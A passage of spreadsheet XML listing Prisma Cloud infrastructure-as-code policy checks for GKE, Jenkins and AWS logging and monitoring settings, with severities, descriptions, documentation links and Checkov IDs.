        <is>
          <t>IaC:Kubernetes:google-container</t>
        </is>
      </c>
      <c r="K1236" t="inlineStr">
        <is>
          <t>The GKE metadata server is disabled</t>
        </is>
      </c>
      <c r="L1236" t="inlineStr"/>
      <c r="M1236" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1236" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1236" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1236" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1236" t="inlineStr"/>
      <c r="R1236" t="inlineStr"/>
      <c r="S1236" t="inlineStr"/>
      <c r="T1236" t="b">
        <v>0</v>
      </c>
      <c r="U1236" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1236" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:google-container-node-pool,google-container-cluster</t>
        </is>
      </c>
      <c r="W1236" t="inlineStr">
        <is>
          <t>Ensure the GKE Metadata Server is Enabled</t>
        </is>
      </c>
      <c r="X1236" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled</t>
        </is>
      </c>
      <c r="Y1236" t="inlineStr"/>
      <c r="Z1236" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["google_container_node_pool","google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA1236" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1236" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1236" t="inlineStr">
        <is>
          <t>CKV_GCP_69</t>
        </is>
      </c>
      <c r="AD1236" t="b">
        <v>1</v>
      </c>
      <c r="AE1236" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1236" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>2e464a60-e3ea-4e23-95a2-f7c5f7e624ec</t>
        </is>
      </c>
      <c r="AI1236" t="inlineStr"/>
      <c r="AJ1236" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1236" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" t="inlineStr"/>
      <c r="B1237" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1237" s="2" t="inlineStr"/>
      <c r="D1237" t="inlineStr"/>
      <c r="E1237" t="inlineStr"/>
      <c r="F1237" t="inlineStr"/>
      <c r="G1237" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1237" t="inlineStr">
        <is>
          <t>IaC:Logging:</t>
        </is>
      </c>
      <c r="K1237" t="inlineStr">
        <is>
          <t>Audit log not installed on Jenkins</t>
        </is>
      </c>
      <c r="L1237" t="inlineStr"/>
      <c r="M1237" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1237" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1237" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1237" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1237" t="inlineStr"/>
      <c r="R1237" t="inlineStr"/>
      <c r="S1237" t="inlineStr"/>
      <c r="T1237" t="b">
        <v>0</v>
      </c>
      <c r="U1237" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1237" t="inlineStr">
        <is>
          <t>IaC:Logging:</t>
        </is>
      </c>
      <c r="W1237" t="inlineStr">
        <is>
          <t>An audit log is a useful tool for monitoring and auditing, and can assist with detecting and investigating security incidents. Jenkins does not offer an audit log in its core version, while this capability is offered by dedicated plugins. No such plugin was found installed in the Jenkins instance.</t>
        </is>
      </c>
      <c r="X1237" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-auditlog-notonstalled</t>
        </is>
      </c>
      <c r="Y1237" t="inlineStr"/>
      <c r="Z1237" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1237" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1237" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1237" t="inlineStr"/>
      <c r="AD1237" t="b">
        <v>1</v>
      </c>
      <c r="AE1237" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1237" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>043071a1-7961-4f09-a601-5facf9e87c93</t>
        </is>
      </c>
      <c r="AI1237" t="inlineStr"/>
      <c r="AJ1237" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1237" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" t="inlineStr"/>
      <c r="B1238" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1238" s="2" t="inlineStr"/>
      <c r="D1238" t="inlineStr"/>
      <c r="E1238" t="inlineStr"/>
      <c r="F1238" t="inlineStr"/>
      <c r="G1238" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1238" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api</t>
        </is>
      </c>
      <c r="K1238" t="inlineStr">
        <is>
          <t>Data Trace is not enabled in the API Gateway Method Settings</t>
        </is>
      </c>
      <c r="L1238" t="inlineStr"/>
      <c r="M1238" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1238" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1238" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1238" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1238" t="inlineStr"/>
      <c r="R1238" t="inlineStr"/>
      <c r="S1238" t="inlineStr"/>
      <c r="T1238" t="b">
        <v>0</v>
      </c>
      <c r="U1238" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1238" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api-gateway-method-settings</t>
        </is>
      </c>
      <c r="W1238" t="inlineStr">
        <is>
          <t>Ensure Data Trace is not enabled in API Gateway Method Settings</t>
        </is>
      </c>
      <c r="X1238" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-276</t>
        </is>
      </c>
      <c r="Y1238" t="inlineStr"/>
      <c r="Z1238" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_api_gateway_method_settings"]}</t>
        </is>
      </c>
      <c r="AA1238" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1238" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1238" t="inlineStr">
        <is>
          <t>CKV_AWS_276</t>
        </is>
      </c>
      <c r="AD1238" t="b">
        <v>1</v>
      </c>
      <c r="AE1238" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1238" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>1fcb5470-a851-496d-b615-98877fcec4c4</t>
        </is>
      </c>
      <c r="AI1238" t="inlineStr"/>
      <c r="AJ1238" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1238" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" t="inlineStr"/>
      <c r="B1239" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1239" s="2" t="inlineStr"/>
      <c r="D1239" t="inlineStr"/>
      <c r="E1239" t="inlineStr"/>
      <c r="F1239" t="inlineStr"/>
      <c r="G1239" t="b">
        <v>1</v>
      </c>
      <c r="H12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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1239" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api</t>
        </is>
      </c>
      <c r="K1239" t="inlineStr">
        <is>
          <t>API Gateway stage does not have logging level defined appropriately</t>
        </is>
      </c>
      <c r="L1239" t="inlineStr"/>
      <c r="M1239" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1239" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1239" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1239" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1239" t="inlineStr"/>
      <c r="R1239" t="inlineStr"/>
      <c r="S1239" t="inlineStr"/>
      <c r="T1239" t="b">
        <v>0</v>
      </c>
      <c r="U1239" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1239" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api-gateway-method-settings,aws-api-gateway-stage</t>
        </is>
      </c>
      <c r="W1239" t="inlineStr">
        <is>
          <t>Ensure API Gateway stage have logging level defined as appropiate</t>
        </is>
      </c>
      <c r="X1239" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate</t>
        </is>
      </c>
      <c r="Y1239" t="inlineStr"/>
      <c r="Z1239" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_api_gateway_method_settings","aws_api_gateway_stage"]}</t>
        </is>
      </c>
      <c r="AA1239" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1239" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1239" t="inlineStr">
        <is>
          <t>CKV2_AWS_4</t>
        </is>
      </c>
      <c r="AD1239" t="b">
        <v>1</v>
      </c>
      <c r="AE1239" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1239" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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39" t="inlineStr">
        <is>
          <t>db7e1267-8931-436b-a841-8daf058afffe</t>
        </is>
      </c>
      <c r="AI1239" t="inlineStr"/>
      <c r="AJ1239" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1239" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" t="inlineStr"/>
      <c r="B1240" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1240" s="2" t="inlineStr"/>
      <c r="D1240" t="inlineStr"/>
      <c r="E1240" t="inlineStr"/>
      <c r="F1240" t="inlineStr"/>
      <c r="G1240" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1240" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api</t>
        </is>
      </c>
      <c r="K1240" t="inlineStr">
        <is>
          <t>API Gateway does not have X-Ray tracing enabled</t>
        </is>
      </c>
      <c r="L1240" t="inlineStr"/>
      <c r="M1240" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1240" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1240" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1240" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1240" t="inlineStr"/>
      <c r="R1240" t="inlineStr"/>
      <c r="S1240" t="inlineStr"/>
      <c r="T1240" t="b">
        <v>0</v>
      </c>
      <c r="U1240" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1240" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api-gateway-stage</t>
        </is>
      </c>
      <c r="W1240" t="inlineStr">
        <is>
          <t>Ensure API Gateway has X-Ray Tracing enabled</t>
        </is>
      </c>
      <c r="X1240" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-15</t>
        </is>
      </c>
      <c r="Y1240" t="inlineStr"/>
      <c r="Z1240" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_api_gateway_stage"]}</t>
        </is>
      </c>
      <c r="AA1240" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1240" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1240" t="inlineStr">
        <is>
          <t>CKV_AWS_73</t>
        </is>
      </c>
      <c r="AD1240" t="b">
        <v>1</v>
      </c>
      <c r="AE1240" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1240" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>00eb12be-f74f-4c18-b80b-4720bbfc5f69</t>
        </is>
      </c>
      <c r="AI1240" t="inlineStr"/>
      <c r="AJ1240" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1240" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" t="inlineStr"/>
      <c r="B1241" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1241" s="2" t="inlineStr"/>
      <c r="D1241" t="inlineStr"/>
      <c r="E1241" t="inlineStr"/>
      <c r="F1241" t="inlineStr"/>
      <c r="G1241" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1241" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api</t>
        </is>
      </c>
      <c r="K1241" t="inlineStr">
        <is>
          <t>API Gateway does not have access logging enabled</t>
        </is>
      </c>
      <c r="L1241" t="inlineStr"/>
      <c r="M1241" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1241" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1241" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1241" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1241" t="inlineStr"/>
      <c r="R1241" t="inlineStr"/>
      <c r="S1241" t="inlineStr"/>
      <c r="T1241" t="b">
        <v>0</v>
      </c>
      <c r="U1241" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1241" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-api-gateway-stage,aws-apigatewayv2-stage</t>
        </is>
      </c>
      <c r="W1241" t="inlineStr">
        <is>
          <t>Ensure API Gateway has Access Logging enabled</t>
        </is>
      </c>
      <c r="X1241" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-17</t>
        </is>
      </c>
      <c r="Y1241" t="inlineStr"/>
      <c r="Z1241" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_api_gateway_stage","aws_apigatewayv2_stage"]}</t>
        </is>
      </c>
      <c r="AA1241" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1241" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1241" t="inlineStr">
        <is>
          <t>CKV_AWS_76</t>
        </is>
      </c>
      <c r="AD1241" t="b">
        <v>1</v>
      </c>
      <c r="AE1241" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1241" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>ee1d5c78-3a80-4fa3-b3c7-01eece8e7b63</t>
        </is>
      </c>
      <c r="AI1241" t="inlineStr"/>
      <c r="AJ1241" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1241" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 3)</t>
        </is>
      </c>
      <c r="B1242" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1242" s="2" t="inlineStr"/>
      <c r="D1242" t="inlineStr"/>
      <c r="E1242" t="inlineStr"/>
      <c r="F1242" t="inlineStr"/>
      <c r="G1242" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1242" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-cloudformation</t>
        </is>
      </c>
      <c r="K1242" t="inlineStr">
        <is>
          <t>AWS CloudFormation stack configured without SNS topic</t>
        </is>
      </c>
      <c r="L1242" t="inlineStr"/>
      <c r="M1242" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1242" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1242" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1242" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1242" t="inlineStr">
        <is>
          <t>8.1.5</t>
        </is>
      </c>
      <c r="R1242" t="inlineStr">
        <is>
          <t>8.1.5.4</t>
        </is>
      </c>
      <c r="S1242" t="inlineStr"/>
      <c r="T1242" t="b">
        <v>0</v>
      </c>
      <c r="U1242" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1242" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-cloudformation-stack</t>
        </is>
      </c>
      <c r="W1242" t="inlineStr">
        <is>
          <t>Ensure that CloudFormation stacks are sending event notifications to an SNS topic</t>
        </is>
      </c>
      <c r="X1242" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic</t>
        </is>
      </c>
      <c r="Y1242" t="inlineStr"/>
      <c r="Z1242" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_cloudformation_stack"]}</t>
        </is>
      </c>
      <c r="AA1242" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1242" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1242" t="inlineStr">
        <is>
          <t>CKV_AWS_124</t>
        </is>
      </c>
      <c r="AD1242" t="b">
        <v>1</v>
      </c>
      <c r="AE1242" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1242" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>8251bd2d-4338-45e0-b0c0-e0ce6a92652a</t>
        </is>
      </c>
      <c r="AI1242" t="inlineStr"/>
      <c r="AJ1242" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1242" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" t="inlineStr"/>
      <c r="B1243" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1243" s="2" t="inlineStr"/>
      <c r="D1243" t="inlineStr"/>
      <c r="E1243" t="inlineStr"/>
      <c r="F1243" t="inlineStr"/>
      <c r="G1243" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1243" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-cloudwatch</t>
        </is>
      </c>
      <c r="K1243" t="inlineStr">
        <is>
          <t>AWS CloudWatch Log groups not configured with definite retention days</t>
        </is>
      </c>
      <c r="L1243" t="inlineStr"/>
      <c r="M1243" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1243" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1243" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1243" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1243" t="inlineStr"/>
      <c r="R1243" t="inlineStr"/>
      <c r="S1243" t="inlineStr"/>
      <c r="T1243" t="b">
        <v>0</v>
      </c>
      <c r="U1243" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1243" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-cloudwatch-log-group</t>
        </is>
      </c>
      <c r="W1243" t="inlineStr">
        <is>
          <t>Ensure CloudWatch log groups specify retention days</t>
        </is>
      </c>
      <c r="X1243" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-13</t>
        </is>
      </c>
      <c r="Y1243" t="inlineStr"/>
      <c r="Z1243" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_cloudwatch_log_group"]}</t>
        </is>
      </c>
      <c r="AA1243" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1243" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1243" t="inlineStr">
        <is>
          <t>CKV_AWS_66</t>
        </is>
      </c>
      <c r="AD1243" t="b">
        <v>1</v>
      </c>
      <c r="AE1243" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1243" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>2ec595da-49df-4802-87eb-2b3b92786bcf</t>
        </is>
      </c>
      <c r="AI1243" t="inlineStr"/>
      <c r="AJ1243" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1243" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" t="inlineStr"/>
      <c r="B1244" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1244" s="2" t="inlineStr"/>
      <c r="D1244" t="inlineStr"/>
      <c r="E1244" t="inlineStr"/>
      <c r="F1244" t="inlineStr"/>
      <c r="G1244" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1244" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-config</t>
        </is>
      </c>
      <c r="K1244" t="inlineStr">
        <is>
          <t>AWS config is not enabled in all regions</t>
        </is>
      </c>
      <c r="L1244" t="inlineStr"/>
      <c r="M1244" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1244" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1244" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1244" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1244" t="inlineStr"/>
      <c r="R1244" t="inlineStr"/>
      <c r="S1244" t="inlineStr"/>
      <c r="T1244" t="b">
        <v>0</v>
      </c>
      <c r="U1244" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1244" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-config-configuration-aggregator</t>
        </is>
      </c>
      <c r="W1244" t="inlineStr">
        <is>
          <t>Ensure AWS Config is enabled in all regions</t>
        </is>
      </c>
      <c r="X1244" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-5-enable-aws-config-regions</t>
        </is>
      </c>
      <c r="Y1244" t="inlineStr"/>
      <c r="Z1244" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_config_configuration_aggregator"]}</t>
        </is>
      </c>
      <c r="AA1244" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1244" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1244" t="inlineStr">
        <is>
          <t>CKV_AWS_121</t>
        </is>
      </c>
      <c r="AD1244" t="b">
        <v>1</v>
      </c>
      <c r="AE1244" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1244" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>706ba56f-78d7-4bd6-ad76-f716914e0b63</t>
        </is>
      </c>
      <c r="AI1244" t="inlineStr"/>
      <c r="AJ1244" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1244" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" t="inlineStr"/>
      <c r="B1245" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1245" s="2" t="inlineStr"/>
      <c r="D1245" t="inlineStr"/>
      <c r="E1245" t="inlineStr"/>
      <c r="F1245" t="inlineStr"/>
      <c r="G1245" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1245" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-db</t>
        </is>
      </c>
      <c r="K1245" t="inlineStr">
        <is>
          <t>AWS Amazon RDS instances Enhanced Monitoring is disabled</t>
        </is>
      </c>
      <c r="L1245" t="inlineStr"/>
      <c r="M1245" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1245" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1245" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1245" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1245" t="inlineStr"/>
      <c r="R1245" t="inlineStr"/>
      <c r="S1245" t="inlineStr"/>
      <c r="T1245" t="b">
        <v>0</v>
      </c>
      <c r="U1245" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1245" t="inlineStr">
        <is>
          <t>IaC:Logging:aws-db-instance,aws-rds-cluster-instance</t>
        </is>
      </c>
      <c r="W1245" t="inlineStr">
        <is>
          <t>Ensure that enhanced monitoring is enabled for Amazon RDS instances</t>
        </is>
      </c>
      <c r="X1245" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances</t>
        </is>
      </c>
      <c r="Y1245" t="inlineStr"/>
      <c r="Z1245" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["aws_db_instance","aws_rds_cluster_instance"]}</t>
        </is>
      </c>
      <c r="AA1245" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1245" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1245" t="inlineStr">
        <is>
          <t>CKV_AWS_118</t>
        </is>
      </c>
      <c r="AD1245" t="b">
        <v>1</v>
      </c>
      <c r="AE1245" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1245" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>c45e811c-c5e1-43c8-b63d-42e3fd034f68</t>
        </is>
      </c>
      <c r="AI1245" t="inlineStr"/>
      <c r="AJ1245" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1245" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" t="inlineStr"/>
      <c r="B1246" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1246" s="2" t="inlineStr"/>
      <c r="D1246" t="inlineStr"/>
      <c r="E1246" t="inlineStr"/>
      <c r="F1246" t="inlineStr"/>
      <c r="G1246" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
